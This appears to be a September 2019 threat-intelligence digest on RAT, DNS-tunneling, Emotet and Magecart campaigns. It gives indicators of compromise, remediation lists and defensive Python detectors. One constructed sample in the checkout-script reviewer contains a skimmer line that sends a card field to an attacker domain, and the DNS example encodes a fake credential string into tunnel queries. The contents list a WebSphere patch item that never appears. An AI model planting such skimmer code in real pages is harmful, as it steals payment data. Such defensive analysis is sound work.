NETWORK INTELLIGENCE SECURITY ADVISORY

Digest: September 2019, Edition 1.0

The major security news items of the month: major threats and a security patch advisory. The advisory also includes IOCs and remediation steps.

IN THIS EDITION:

Security Advisory Listing (Severity)

• The two Remote Access Trojans (RAT) called OrcusRAT and RevengeRAT, found targeting Government, Financial Institutions, IT Service Providers and Consultancies on a global scale (High)
• A campaign from threat actors found using a backdoored SSH (Secure Shell) client to exfiltrate credentials via DNS tunneling from compromised machines to the attacker's C&C server (High)
• New variant of the Emotet Banking Trojan comes with added capabilities to intercept email conversations and uses spoofed email headers and content to evade anti-spam detection mechanisms (High)
• Mirrorthief group behind the new Magecart malware attack found targeting Web Technology Service Providers of the E-Commerce and Hospitality industries on a global scale (High)

Security Patch Advisory (Severity)

• Sensitive Information Disclosure Vulnerability (CVE-2019-4505) found in IBM WebSphere Application Server (High)

To know more about our services reach us at info@niiconsulting.com or visit www.niiconsulting.com

SECURITY ADVISORY

The two Remote Access Trojans (RAT) called OrcusRAT and RevengeRAT, found targeting Government, Financial Institutions, IT Service Providers and Consultancies, on global scale

Date: August 29, 2019
Severity: High

IMPACT
This poses a serious risk of unauthorized access, data breach and financial loss, and can damage the reputation of an organization.

INTRODUCTION
The attackers used multiple, distinct Tactics, Techniques and Procedures (TTPs) in each of their malware campaigns: persistence techniques for their fileless Remote Access Trojans (RATs), obfuscation techniques to hide the C2 communication and the C2 infrastructure details, and evasion techniques that keep automated malware analysis platforms from examining the malicious code and that evade detection by antivirus programs.

The campaigns used well-crafted spear-phishing emails pretending to come from authorities such as the Better Business Bureau (BBB), the Australian Competition & Consumer Commission (ACCC), the Ministry of Business Innovation & Employment (MBIE) and other regional agencies.

Each email carried either a macro-enabled Word document with JavaScript code hidden as white text on a white background, or a drive-by-download link to an attacker-controlled server hosting a ZIP archive. The archive contains the malicious PE32 file, bearing a double extension such as "filename.pdf.exe", that infects the system.

OrcusRAT and RevengeRAT use APC injection to inject their malicious code into a signed, legitimate Windows process already running in memory; the malicious code of both RATs is never stored on disk.

The malicious code is executed every 60 seconds as part of the malware's call-back routine, which lets the attackers listen for and take backdoor access to the compromised system.

The C2 infrastructure was observed leveraging Dynamic DNS (DDNS) and OpenVPN in an attempt to obfuscate the attacker's C2 infrastructure and communication.

AFFECTED PRODUCTS
• Microsoft Windows Workstation and Server products.

READ: SWEED: Exposing years of Agent Tesla campaigns
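The fixed 60-second call-back described above is something a defender can hunt for in proxy, firewall or DNS logs without any signature: a compromised host talks to the same destination at an almost constant interval, whereas human-driven traffic does not. The block below is an added example, not code from the advisory or from NII; the log line format, the thresholds and the sample records are all constructed for the example. The C2 hostname is taken from the advisory's own domain list (qstorm.chickenkiller.com, a Dynamic DNS name of the kind the advisory says the C2 infrastructure used).

```python
"""Flag fixed-interval call-backs (beaconing) in connection logs."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median


def constructed_log():
    """Constructed sample, not real telemetry: host 10.0.0.5 calls back to a
    Dynamic DNS name from the advisory's IOC list every 60 s (+/- 2 s jitter);
    host 10.0.0.7 browses an ordinary site at irregular times.
    Assumed line format: '<ISO timestamp> <src_ip> <dst_host> <dst_port>'."""
    base = datetime(2019, 8, 29, 9, 0, 0)
    lines = []
    for i in range(10):
        t = base + timedelta(seconds=60 * i + (2 if i % 3 == 0 else 0))
        lines.append(f"{t.isoformat()} 10.0.0.5 qstorm.chickenkiller.com 443")
    for off in (0, 7, 130, 131, 400, 402, 900, 1800, 1801, 1900):
        t = base + timedelta(seconds=off)
        lines.append(f"{t.isoformat()} 10.0.0.7 www.example.com 443")
    return sorted(lines)


def parse(lines):
    """Yield (timestamp, src, dst) tuples from the assumed log format."""
    for line in lines:
        ts, src, dst, _port = line.split()
        yield datetime.fromisoformat(ts), src, dst


def beacon_candidates(records, min_hits=5, max_jitter=0.10, min_regular=0.8):
    """Return {(src, dst): period_seconds} for connection pairs whose
    inter-arrival gaps cluster tightly around one period. A RAT that fires
    its call-back routine every 60 s produces gaps of ~60 s; browsing does
    not. The thresholds are tunable assumptions, not values from the advisory."""
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)
    found = {}
    for pair, times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if period <= 0:
            continue
        # Fraction of gaps that sit within +/- max_jitter of the median period.
        regular = sum(abs(g - period) <= max_jitter * period for g in gaps) / len(gaps)
        if regular >= min_regular:
            found[pair] = period
    return found


if __name__ == "__main__":
    for (src, dst), period in beacon_candidates(parse(constructed_log())).items():
        print(f"beacon: {src} -> {dst} every ~{period:.0f}s")
```

The check is deliberately blind to the period, so it also surfaces legitimate periodic traffic (NTP, update checks, monitoring agents); in practice the output is joined against an allowlist of known periodic destinations, and a hit to a Dynamic DNS domain or to one of the IOCs above is escalated first.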

IP ADDRESSES
• 193.161.193.99
• 205.144.171.185

DOMAINS
• skymast231-001-site1.htempurl.com
• qstorm.chickenkiller.com
• botinbox.tk
• forcemc.tk
• portmap.host
• shloki.xyz
• malikkhan-001-site1.htempurl.com
• pay-pal-deutschland-3.com
• stitours.acutekpanama.com
• panalette.alexchild.net
• dirpan.com
• wordpress.dirpan.com
• multiserviciosfruto.alexchild.net
• trokcarveiculos.com.br
• alexchild.net
• agency.alexchild.net
• cybercafe.alexchild.net
• maximtours-001-site6.atempurl.com
• r2asistemas.com.br

REMEDIATION
1. Ensure an anti-phishing solution is procured and deployed correctly.
2. Ensure the EXTERNAL EMAIL banner is enabled and configured with an appropriate warning message.
3. Ensure access to public file-sharing platforms such as Dropbox and Google Drive is strictly restricted on the corporate network. Where there is a business requirement, ensure that Dropbox and Google Drive traffic is filtered through a Web Application Firewall (WAF).
4. Enable deep inspection for outbound FTP and HTTP traffic passing through the WAF.
5. Monitor, via the SIEM solution, for excessive LDAP queries from a single system within a 5-minute window.
6. Ensure IBM AIX and Windows OS are up to date with the latest security patches, and that proper access controls are in place.
7. Ensure access controls are properly implemented and periodically evaluated for the ATM Switch and SWIFT network.
8. Closely monitor for any intrusion or suspicious activity on the ATM Switch and SWIFT network.
9. Ensure proper access controls are in place for NetBanking and third-party payment services.
10. Closely monitor for any intrusion or suspicious activity on NetBanking and third-party payment services.
11. Ensure proper network segmentation is in place between the DMZ and the internal network.
12. Strictly use least-privilege accounts throughout the enterprise network.
13. Strictly restrict inbound communication on ports 135, 139, 445 and 3389 from external networks (Internet).
14. Restrict access to ports 135, 139, 445 and 3389 on production servers; grant access only when needed.
15. Ensure proper access control and email filtering are in place to protect email (Exchange) servers and email accounts.
16. Ensure PowerShell is disabled on non-administrative systems in the production environment.
17. Block the listed IPs/domains on security devices.
18. Block hashes that are not detected by your antivirus program or not known to your antivirus vendor.

SECURITY ADVISORY

A campaign from threat actors found using a backdoored SSH (Secure Shell) client to exfiltrate credentials via DNS tunneling from compromised machines to the attacker's C&C server

Date: September 04, 2019
Severity: High

IP ADDRESSES
• 164.132.181.85
• 194.99.23.199
• 162.255.119.147
• 162.255.119.26

DOMAINS
• marweve.xyz
• startheavilyprogressivefile.icu
• californiabetting.org
• nhcccroquet.com
• pretpersonnel.top
• opendevelopedhighlyfile.icu
• fastergreatreformfileclicks.icu
• updateoriginaluberfile.icu
• initiatecompletelycurrentfile.icu
• b7cvyzfjvrxb.icu
• maketypeaskappclicks.icu
• fasttypedlappclicks.icu
• uuwwhytvzbatons.review
• dgtrbobdpinnock.review
• app-mobilesecurity.com
• qkafulxxstiflers.review
• fuwkdshine.download
• teks.tv
• qjhumibypassing.review
• bqskpbnwqaraks.review
• luvluvluvfaneto.club
• smartupdflash.win
• closeramiqp.xyz
• trfqyxenophya.download
• aqwjxjxs.com
• clickanimation.info
• linkedinlocaldublin.com
• bdb0b3atw4.icu
• tredirectonowmain.date
• duplnqniebats.download
• vnchicago.com
• responservlslpl.icu
• toussaint.xyz
• vipkontakter4you.xyz
• runrenewedhighlyfile.icu
• doujindesu.wtf
• restoreextremelyswiftfile.icu
• maxwin99.cc
• openhighlyquickprogram.icu
• vqtvyssith.xyz
• xn--ea-7rs95c.com
• setupadvancedmostfile.icu
• khpiu7ljixn7.xyz
• smalloriginaltype-theclicks.icu
• runheavilystrongprogram.icu
• streamspeedyheavilyprogram.icu
• mixflashsport.review
• b2llll1111.fun
• loadgreatlyfreeprogram.icu
• operatequickoverlyfile.icu
• playubernewestproduct.icu
• startoverlyrenewedfile.icu
• performquickcompletelyfile.icu
• watchpreciseheavilyprogram.icu
• streammostdevelopedfile.icu
• watchrenewedextremelyfile.icu
• initiategreatlyoriginalprogram.icu
• freakiestcqneo.xyz
• weberdut.com
• icdn-cloud.com
• trucden.win
• kitchendesign-liverpool.co.uk
• upgradedldealappclicks.top
• iuewrnkadwekk.xyz
• appleid-setting.com
• b6n.cc
• c6c977c19fbf492b.xyz
• wzomps.us
• smallbestdowngradedataclicks.icu
• startprecisemostproduct.icu
• makefuturebestfileclicks.top
• synchighlycurrentplayer.icu
• 2384y8ghdfqw.com
• syncdevelopedoverlyprogram.icu
• syncintenselylatestprogram.icu
• 4plus.club
• saxhjs6ui5.info
• 5ucyhkbzd.info
• toponlinebestdataclicks.icu
• slapmoreflash.stream
• invoice-345683761.website
• setupcurrentheavilyfile.icu
• jjflvmvj308.site
• startquickoverlyfile.icu
• setupcurrentintenselyprogram.icu
• bettergreatfinishappclicks.top
• initiaterecenthighlyprogram.icu
• initiatelatestmostproduct.icu
• streamprecisehighlyfile.icu
• initiatecurrentheavilyprogram.icu
• levelflashtop.stream
• pickflashdel.download
• raeval.com
• altavistadelago.com
• dirflashguardtop.win
• syncoverlyswiftprogram.icu
• performextremelyswiftfile.icu
• installmostfreeproduct.icu
• 1134oxford.com
• imaps.id
• watchrefinedintenselyprogram.icu
• boot-upspeedyoverlyprogram.icu
• fixextremelyquickproduct.icu
• ayfpdrsuth.xyz
• leulusdtdt.xyz
• syncheavilynewestprogram.icu
• runuberprogressiveprogram.icu
• watchquickmostproduct.icu
• opendevelopedintenselyfile.icu
• installoverlyrefinedfile.icu
• checkmap.info
• luxury-watches.top
• loadintenselynewestfile.icu
• nage.me
• mixdlgreatdataclicks.icu
• mixdealapplefileclicks.top
• runheavilyoriginalproduct.icu
• launchquickintenselyfile.icu
• updateubercurrentfile.icu
• syncrecentoverlyfile.icu
• mixseparatedealappclicks.icu
• betterlastdealappclicks.top
• fixbestfreshfileclicks.icu
• kamotta.com
• viewpeace.com
• chinanews.network
• jfnusslubbering.review
• qqqb99kkkapv.com
• avdntcbd.com
• qwgkyfunsurmised.review
• getlatestupdatefortechandnews.trade
• rnebzumino.review
• combinationofusefulassetsnow.download
• fdjwrqwhlaciniae.review
• registernowandgetthelatest.bid
• thegoodmainforcontentset.win
• beatplaymusic.download
• repelisonline.net
• outloook.live
• getdealfuturefileclicks.top
• fastmaintaintypefileclicks.icu
• hostgatorcoupon.co
• 677676376manbsmcoeorot.live
• xn--off365-r9a6y.com
• thegoodonesystemforcontentsrclear.download
• mediafuturedeal-rawclicks.icu
• cjyw2lo9c7h8.icu
• 7ufd6rxew5.icu
• brandnewstart2finisheextensionsrightnow.trade
• analyticalobjectdeductionconvertor.win
• joomm.xyz
• tipsforhealth.xyz
• pixelradio.xyz
• stevejobless.xyz
• robwilson.xyz
• mobilefun.xyz
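Blocking the domains above catches this campaign's infrastructure, but DNS tunneling itself leaves a shape in resolver logs that does not depend on any particular domain: almost every query to the attacker's zone carries a new, long, encoded subdomain, often as TXT or NULL lookups. The block below is an added example, not code from the advisory or from NII, showing that heuristic run over constructed query records; the record format, the thresholds and the two-label "registrable domain" shortcut are assumptions, and the exfiltration domain is taken from the advisory's own list.

```python
"""Flag registrable domains whose subdomain traffic looks like a DNS data channel."""
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Naive registrable domain: the last two labels. Assumption: no public
    suffix list is consulted, so names under e.g. .co.uk would be grouped wrongly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def dns_tunnel_candidates(queries, min_queries=8, min_unique_ratio=0.9, min_avg_len=30):
    """queries: iterable of (qtype, qname). Returns {domain: metrics} for domains
    where nearly every query carries a never-before-seen, long subdomain.
    Entropy and the TXT/NULL share are reported for the analyst but not gated on,
    because they vary with the encoding the tunnel uses."""
    by_domain = defaultdict(list)
    for qtype, qname in queries:
        by_domain[registered_domain(qname)].append((qtype, qname.lower().rstrip(".")))
    hits = {}
    for domain, items in by_domain.items():
        if len(items) < min_queries:
            continue
        subs = [q[: -(len(domain) + 1)] for _, q in items if q.endswith("." + domain)]
        if not subs:
            continue
        unique_ratio = len(set(subs)) / len(items)
        avg_len = sum(map(len, subs)) / len(subs)
        if unique_ratio >= min_unique_ratio and avg_len >= min_avg_len:
            hits[domain] = {
                "queries": len(items),
                "unique_ratio": round(unique_ratio, 2),
                "avg_subdomain_len": round(avg_len, 1),
                "txt_ratio": round(sum(t.upper() in ("TXT", "NULL") for t, _ in items) / len(items), 2),
                "avg_entropy": round(sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs), 2),
            }
    return hits


def constructed_queries():
    """Constructed sample, not real traffic: a backdoored SSH client exfiltrating
    a captured credential string in hex chunks via TXT queries to a domain from
    the advisory's IOC list, mixed with ordinary lookups."""
    secret = b"user=alice;pass=Hunter2!;host=bastion.corp;" * 5
    hexed = secret.hex()
    tunnel = [("TXT", f"{i:04x}{hexed[j:j + 40]}.marweve.xyz")
              for i, j in enumerate(range(0, len(hexed), 40))]
    benign = [("A", "www.example.com")] * 20 + [("A", "mail.example.com")] * 5
    benign += [("A", f"img{i}.cdn.example.net") for i in range(10)]  # many names, but short
    return tunnel + benign


if __name__ == "__main__":
    for domain, metrics in dns_tunnel_candidates(constructed_queries()).items():
        print(domain, metrics)
```

The length gate is what keeps ordinary CDN and load-balancer names (many distinct but short subdomains) out of the result; the ratio gate is what keeps high-volume corporate zones out. Both thresholds should be tuned against a week of the resolver's own logs before alerting on them.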

SECURITY ADVISORY

New variant of Emotet Banking Trojan comes with added capabilities to intercept email conversation and uses spoofed email header & content to evade Anti-Spam detection mechanism.

Date: September 18, 2019
Severity: High

IMPACT
This poses a serious risk of unauthorized access, data breach and financial loss, and might damage the reputation of an organization.

INTRODUCTION
A new variant of the Emotet Banking Trojan comes with added capabilities to intercept ongoing email conversations on the compromised system and to send email with a malicious attachment to all contacts, spoofing the email header and content so that the message appears to belong to the existing conversation. This feature allows Emotet to evade anti-spam email security solutions as well as IPS systems, because the spoofed header and content make the malicious email look legitimate. The malicious emails are sent without the victim's knowledge, at a fixed time interval, and are used to exfiltrate sensitive data from the victim's system. In addition, the Internet protocols used for email services are also used for malware call-back and C2 communication between the victim's system and the attacker's C2 server. This poses a serious risk of unauthorized access, data breach and financial loss to organizations.

VULNERABLE
• All Microsoft Windows Workstation and Server systems are vulnerable.

READ: Emotet is back after a summer break
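Because the hijacked reply reuses a real subject, a real thread identifier and a real contact's name, content filters see a legitimate-looking conversation. What the spoofing cannot reproduce is the sending infrastructure: the message arrives from a host that is not the From domain's mail system, so the envelope sender and SPF/DKIM results disagree with the visible From header. The block below is an added example, not code from the advisory or from NII, that applies that header-alignment check to two constructed messages; the message contents, the Authentication-Results format and the list of macro-capable attachment types are assumptions for the example.

```python
"""Triage a reply for Emotet-style thread hijacking: header misalignment plus a macro-capable attachment."""
from email import message_from_string, policy
from email.utils import parseaddr

# Assumption: file types the filter treats as macro-capable Office documents.
MACRO_EXTENSIONS = (".doc", ".docm", ".xls", ".xlsm")


def domain_of(addr):
    """Lower-cased domain part of an address header value ('' if absent)."""
    return parseaddr(str(addr))[1].rpartition("@")[2].lower()


def auth_failed(msg):
    """True if an Authentication-Results header reports an SPF or DKIM failure.
    Assumption: the gateway writes results as 'spf=fail' / 'dkim=fail'."""
    results = " ".join(str(h) for h in msg.get_all("Authentication-Results", [])).lower()
    return "spf=fail" in results or "dkim=fail" in results


def thread_hijack_indicators(raw_message):
    """Return the list of indicators found; an empty list means nothing suspicious."""
    msg = message_from_string(raw_message, policy=policy.default)
    indicators = []
    is_reply = bool(msg.get("In-Reply-To") or msg.get("References"))
    if is_reply:
        from_domain = domain_of(msg.get("From", ""))
        envelope_domain = domain_of(msg.get("Return-Path", ""))
        if envelope_domain and envelope_domain != from_domain:
            indicators.append("reply whose envelope sender domain differs from the From domain")
        if auth_failed(msg):
            indicators.append("reply failed SPF/DKIM authentication")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(MACRO_EXTENSIONS):
            indicators.append(f"macro-capable attachment {name}")
    return indicators


# Constructed messages, not real mail. HIJACKED imitates a reply injected into an
# existing thread from attacker infrastructure; LEGIT is the genuine counterpart.
HIJACKED = """\
Return-Path: <bounce@mail-relay-xyz.example.net>
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=mail-relay-xyz.example.net; dkim=none
From: "Bob Vendor" <bob@vendor.example>
To: alice@corp.example
Subject: RE: Invoice for September
In-Reply-To: <20190910.1234@corp.example>
References: <20190910.1234@corp.example>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Hi Alice, please see the attached document.

> Bob, can you resend the invoice?
--b1
Content-Type: application/msword; name="Invoice_091.doc"
Content-Disposition: attachment; filename="Invoice_091.doc"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

LEGIT = """\
Return-Path: <bob@vendor.example>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=vendor.example; dkim=pass header.d=vendor.example
From: "Bob Vendor" <bob@vendor.example>
To: alice@corp.example
Subject: RE: Invoice for September
In-Reply-To: <20190910.1234@corp.example>
References: <20190910.1234@corp.example>
Content-Type: text/plain

Alice, the invoice is in the portal; no attachment needed.
"""

if __name__ == "__main__":
    print("hijacked:", thread_hijack_indicators(HIJACKED))
    print("legit:   ", thread_hijack_indicators(LEGIT))
```

Mailing lists and forwarding services also produce envelope/From mismatches, so the misalignment alone is a triage signal rather than a verdict; the combination of a mismatched, authentication-failing reply that carries a macro-capable document is what should be quarantined ahead of the user seeing it.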

IP ADDRESSES
• 186.4.172.5
• 201.212.57.109
• 104.131.11.150
• 178.32.255.133
• 93.78.205.196
• 176.58.93.123
• 104.131.58.132
• 216.154.222.52
• 89.188.124.145
• 179.62.18.56
• 143.0.245.169
• 190.92.103.7
• 159.65.241.220
• 203.130.0.67
• 151.80.142.33
• 185.187.198.4
• 181.230.126.152
• 201.250.11.236
• 182.76.6.2
• 179.12.170.88
• 104.236.185.25
• 190.104.64.197
• 187.155.233.46
• 198.199.88.162
• 181.36.42.205
• 94.205.247.10
• 128.199.78.227
• 162.144.119.216
• 85.105.215.241
• 162.243.125.212
• 190.195.129.227
• 190.220.69.69
• 217.113.27.158
• 142.93.88.16
• 190.117.206.153
• 200.123.150.89
• 104.131.208.175
• 88.215.2.29
• 86.98.25.30
• 200.21.90.6
• 94.177.253.126
• 190.13.146.47
• 91.92.191.134
• 139.59.242.76
• 59.152.93.46
• 185.129.92.210
• 79.127.57.42
• 181.81.143.108
• 69.43.168.232
• 70.45.30.28
• 190.10.194.42
• 190.200.64.180
• 178.254.6.27
• 78.109.34.178
• 92.222.125.16
• 198.199.106.229

DOMAINS
• wardesign.com
• mireiatorrent.com
• multiesfera.com
• ilimler.net
• mangaml.com
• autorepuestosdml.com
• pep-egypt.com
• danangluxury.com
• gcesab.com
• bondagetrip.com
• sunflagsteel.com
• hotelkrome.com
• followergods.com
• startupforbusiness.com
• refferalstaff.com
• broadpeakdefense.com
• think1.com
• lecairtravels.com
• biyunhui.com
• nautcoins.com
• blockchainjoblist.com
• womenempowermentpakistan.com
• atnimanvilla.com
• yeuquynhnhai.com
• deepikarai.com
• customernoble.com
• tabxolabs.com
• mutlukadinlarakademisi.com
• holyurbanhotel.com
• keikomimura.com
• zhaoyouxiu.com
• covergt.com
• inesmanila.com
• apartahotelfamilyhouse.com
• techiwant.com
• limkon.com
• dentalsearchsolutions.com
• sirijayareddypsychologist.com
• keqiang.pro
• alldc.pw
• playasrivieramaya.com
• dywanypers.pl
• labersa.com
• behlenjoiner.com
• maceju.com
• maymaychihai.com
• jannahqu.org
• szmoldparts.com
• nomadztruck.com
• brkhukuk.com
• interpathlaboratories.com
• gpmandiri.com
• njb-gmbh.com
• ketabnema.com
• easy-service.org
• ngomavibe.co.ke
• jannatkhah.ir
• alcaido.com
• 7dot.cn
• agipasesores.com
• goleta105.com
• makanaliabadian.ir
• ekerisiltihaliyikama.com
• nsfund.mn
• shejipxw.com
• ekonkarserai.com
• 59055.cn
• xinlou.info
• larissalinhares.com.br
• toptarotist.nl
• robotechcity.com
• fitchciapara.com
• internetshoppy.com
• blog.medkad.com
• komatireddy.net
• hippbeta.000webhostapp.com
• navenpsicologosgetafe.es
• guimaraesconstrutorasjc.com.br
• soo.sg
• eroscenter.co.il
• stackspay.com
• reza-khosravi.com
• w3brasil.com
• pronhubhd.com
• karenshealthfoods.com
• overcreative.com
• antonresidential.com
• gawaher-services.com
• thepropertydealerz.com
• highamnet.co.uk
• hpaudiobooksfree.com
• aldocontreras.com
• irismal.com
• irbf.com
• hanabishi.net
• doski.by
• givehopeahand.org
• alohasoftware.net
• chuquanla.com
• parsafanco.com
• iib123.com
• tokobajuaisyah.com
• haosanwang.com.tw
• chinapacific.co.nz
• rebel.ae
• vaner.com.sg
• situsjudimurah.com
• i-conglomerates.com
• greenedus.com
• parsroman.ir
• revival-remaps.co.uk
• sunchipaint.com.vn
• kisharzoni.ir
• dp4kb.magelangkota.go.id
• joshgeneralremodeling.us
• canvas.printageous.com
• mohsinsaeedulhaq.com
• anysbergbiltong.co.za
• maxtraderpro.com
• cornelbusiness.co.uk
• mobiextend.com
• safarnavade.ir
• iewa.sk
• comicxy.club
• blnautoclub.ro
• osim-heshbon.co.il
• trulykomal.com
• democuk.tk
• lamaggiora.it
• unlimit517.co.jp
• rpaconsultores.cl
• stayfitphysio.ca
• phongchitt.com
• dyingtoachieve.com
• v7gfx.de
• hawk-lines.com
• alcam.ch
• tys-yokohama.co.jp
• aivaelectric.com
• cgi.org.ar
• intellmix.com
• iloveat.fr
• xwai.com
• suisuncitystorage.com
• rupertsherwood.com
• sampling-group.com
• schaye.net
• sestili.it
• sirinadas.com
• levarudevich.ru
• mfstol.ru
• urbaniak.waw.pl
• woellhaf-it.de
• izeres.ml
• mssewatrust.com
• deleogun.com
• airnetinfotech.com
• adinehac.ir
• muaxuanmedia.com
• banglanews-24.com
• schwaemmlein.de
• toggwyler.ch
• winebiddingthailand.com
• novaworld-novaland.vn
• steller-architekt.eu
• shirtprinter.de
• taskforce1.net
• nacindia.in
• sdorf.com.br

REMEDIATION
1. Ensure Microsoft Windows workstations and servers are up to date with the latest security patches.
2. Strictly use least-privilege accounts throughout the enterprise network.
3. Immediately apply the security patches for Microsoft vulnerabilities CVE-2019-1214, CVE-2019-1215, CVE-2019-1291, CVE-2019-1290, CVE-2019-0788, CVE-2019-0787, CVE-2019-1285, CVE-2019-1272, CVE-2019-1269 and CVE-2019-1280 on Windows OS.
4. Ensure the security patches for Microsoft SMB vulnerabilities CVE-2019-0633, CVE-2019-0630 and CVE-2019-0786 are applied on Windows OS.
5. Disable SMB version 1 (SMBv1) on Windows OS.
6. Strictly restrict inbound communication on ports 135, 139, 445 and 3389 from external networks (Internet).
7. Restrict access to ports 135, 139, 445 and 3389 on production servers; grant access only when needed.
8. Ensure the antivirus signature database is up to date and that antivirus scans run on a daily or weekly basis.
9. Ensure web browsers are updated to the latest release.
10. Ensure proper access control and email filtering are in place to protect email (Exchange) servers and email accounts.
11. Ensure PowerShell and Remote Desktop are disabled on non-administrative systems in the production environment.
12. Ensure VBScript execution in Internet Explorer is disabled on connected Windows systems.
13. Ensure macros are disabled in Microsoft Office products on connected Windows systems.
14. Ensure ActiveX controls are disabled in Office files.
15. Ensure ActiveX controls are disabled in Internet Explorer.
16. Ensure Adobe Flash Player is updated to the latest release.
17. Ensure internet-facing devices, applications and services use strong, complex passwords.
18. Block the listed IPs/domains on security devices.

SECURITY ADVISORY

Mirrorthief group behind the new Magecart malware attack found targeting Web Technology Service Providers of E-Commerce and Hospitality industries in United States, Canada and other countries.

Date: September 19, 2019
Severity: High

IMPACT
This poses a serious risk of data breach and financial loss, and might damage the reputation of an organization.

INTRODUCTION
The Mirrorthief group is behind a new Magecart (online skimmer for payment card data) malware attack targeting Web Technology Service Providers of the E-Commerce and Hospitality industries in the United States, Canada and other countries on a global scale.

The attackers' tactic is to deploy the Magecart skimmer code straight into the repository of JavaScript libraries belonging to the Web Technology Service Provider. These libraries are used on thousands of vendor websites and are linked specifically into the payment/checkout page that accepts payment card data from the vendor's customers. Compromising the third-party JavaScript library that supports the online payment gateway lets the attacker collect card data from all of those websites at once, instead of compromising thousands of websites individually. This tactic has become a common trend among financially motivated attackers, because it is more scalable and yields a large number of payment card records in one shot on a global scale.

Magecart attacks have become a persistent problem for businesses that accept online payment through their websites, especially E-Commerce websites. The attack has been hard to detect, or detected at a very low rate, from September 04, 2018 to date. This is a continuously emerging threat to payment card data, and it is strongly recommended to choose third-party JavaScript libraries wisely. We also strongly recommend that our customers stay aligned with a zero-trust approach while assessing the risk associated with third-party JavaScript libraries or any other services supporting the online payment gateway/system.

VULNERABLE
• This malware attack affects all web applications running on WordPress, Drupal, Apache Tomcat or Apache HTTP Server, Apache Struts, Oracle WebLogic, Microsoft IIS, IBM WebSphere Application Server, etc.

READ: Magecart Skimming Attack Targets Mobile Users of Hotel Chain Booking Websites
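The attack described above works because the checkout page trusts whatever the third-party host serves today. Two controls close most of that gap: an allowlist of the hosts a checkout page may load script from (the domain in this advisory's IOC list, googletrackmanager.com, is a lookalike that no allowlist would contain), and Subresource Integrity (SRI), where the page pins each external script to a hash so a modified library is refused by the browser. The block below is an added example, not code from the advisory or from NII, that reviews a constructed checkout page against both rules; the page, the script bodies, the allowlist and the vendor hostname are all assumptions for the example.

```python
"""Review the external scripts of a checkout page: host allowlist and SRI verification."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptTags(HTMLParser):
    """Collect the attributes of every <script> start tag."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def sri_digest(body, algo="sha384"):
    """Subresource Integrity value for a script body, e.g. 'sha384-<base64 digest>'."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"


def review_external_scripts(html, allowed_hosts, fetched):
    """Return (src, finding) pairs for scripts loaded from a host outside the
    allowlist, without an integrity attribute, or whose body no longer matches it.
    `fetched` maps src URL -> bytes; supplied offline here, fetched in practice."""
    parser = _ScriptTags()
    parser.feed(html)
    findings = []
    for attrs in parser.scripts:
        src = attrs.get("src")
        if not src:
            continue  # inline script: reviewed with the page source, not here
        host = urlparse(src).hostname or ""
        if host not in allowed_hosts:
            findings.append((src, "host not in third-party allowlist"))
        integrity = attrs.get("integrity")
        if not integrity:
            findings.append((src, "no integrity attribute"))
        elif src in fetched:
            algo = integrity.split("-", 1)[0]
            if sri_digest(fetched[src], algo) != integrity:
                findings.append((src, "integrity mismatch: script content changed"))
    return findings


# Constructed sample, not a real site. The vendor's analytics library has been
# modified on the CDN to post the card number to the lookalike domain from the IOC list.
CHECKOUT_JS = b"document.getElementById('pay').addEventListener('submit', validate);\n"
ANALYTICS_JS = b"window.track = function (e) { /* vendor analytics */ };\n"
TAMPERED_ANALYTICS_JS = ANALYTICS_JS + (
    b"new Image().src = 'https://googletrackmanager.com/c?' + document.forms[0].cc.value;\n"
)
ALLOWED_HOSTS = {"cdn.vendor.example"}  # assumption: the only approved script host
CHECKOUT_HTML = f"""<html><head>
<script src="https://cdn.vendor.example/checkout.js" integrity="{sri_digest(CHECKOUT_JS)}" crossorigin="anonymous"></script>
<script src="https://cdn.vendor.example/analytics.js" integrity="{sri_digest(ANALYTICS_JS)}" crossorigin="anonymous"></script>
<script src="https://googletrackmanager.com/gtm.js"></script>
</head><body><form id="pay"><input name="cc"></form></body></html>
"""
FETCHED = {
    "https://cdn.vendor.example/checkout.js": CHECKOUT_JS,
    "https://cdn.vendor.example/analytics.js": TAMPERED_ANALYTICS_JS,
    "https://googletrackmanager.com/gtm.js": b"/* unknown third party */\n",
}

if __name__ == "__main__":
    for src, finding in review_external_scripts(CHECKOUT_HTML, ALLOWED_HOSTS, FETCHED):
        print(f"{finding}: {src}")
```

SRI only helps when the pinned hash travels with the page and the library's content is stable; an attacker who can edit the checkout page itself can also edit the integrity value, and a CDN that rewrites scripts per request cannot be pinned at all. Pair the check with a Content-Security-Policy `script-src` built from the same allowlist so the browser enforces the host restriction even if a tag is injected.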

IP ADDRESSES
• 2.56.215.66

DOMAINS
• googletrackmanager.com

HASHES (SHA-256)
• ac58602d149305bd2331d555c15e6292bd5d09c34ade9e5eebb81e9ef1e7b312

DETECTED BY ANTIVIRUS (hash above)

Symantec      TrendMicro    McAfee        Quick Heal    Microsoft
No            No            No            No            Yes

DETECTED BY IPS, WAF and MGW (hash above)

Cylance       Palo Alto     Fortinet      McAfee GW     Sophos ML
NOT KNOWN     No            No            NOT KNOWN     NOT KNOWN

REMEDIATION
1. Ensure web applications running on WordPress, Drupal, Apache Tomcat or Apache HTTP Server, Apache Struts, Oracle WebLogic, Microsoft IIS, IBM WebSphere Application Server, etc., are up to date with the latest security patches.
2. Ensure file and directory permissions on the web server are properly configured.
